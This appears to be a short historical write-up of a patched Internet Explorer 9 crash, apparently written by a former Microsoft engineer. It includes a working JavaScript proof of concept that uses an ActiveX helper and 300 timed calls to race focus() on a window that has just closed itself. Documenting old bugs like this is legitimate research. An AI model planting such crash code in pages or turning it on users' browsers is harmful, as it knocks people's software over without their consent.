IE9 DoS: Executing a Method on a Closed Window

This crash required a race condition: open a new window, have it close itself immediately via a script, and then try to call a method on the returned window reference before the engine has finished cleaning up. Hitting the race consistently required running the sequence many times in rapid succession.

<script language="JavaScript">
function main()
{
    var newThread = new ActiveXObject("htmlFile");newThread.write(1);newThread.close();newThread.parentWindow.mainWindow = window;
    var strCode =   'mainWindow.document.open();' +
                    'newWindow = mainWindow.open();' +
                    'newWindow.document.write("<script>window.close();<\/script>");' +
                    'newWindow.focus();';
    
    for (var i=0; i < 300; i++)
    {
        newThread.parentWindow.setTimeout(strCode, 100 * i);
    }
    alert("Please, don't close this alert. We need it opened until the browser crashes.\n\nWe are opening many windows with a single click [WOOBR #1091256] in order to make the PoC self-working. " +
          "However, the crashing code is just the one shown in the explanation of this PoC.");
}
</script>

The core issue is simple: open a window, write a self-closing script into it, then call focus() on the reference after the window has already closed. The engine dereferences a vtable pointer at offset +4 from a null, which is a null-pointer read rated PROBABLY_NOT_EXPLOITABLE. The secondary htmlFile thread and the open-blocking alert are just scaffolding to make the race reliable without user interaction.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.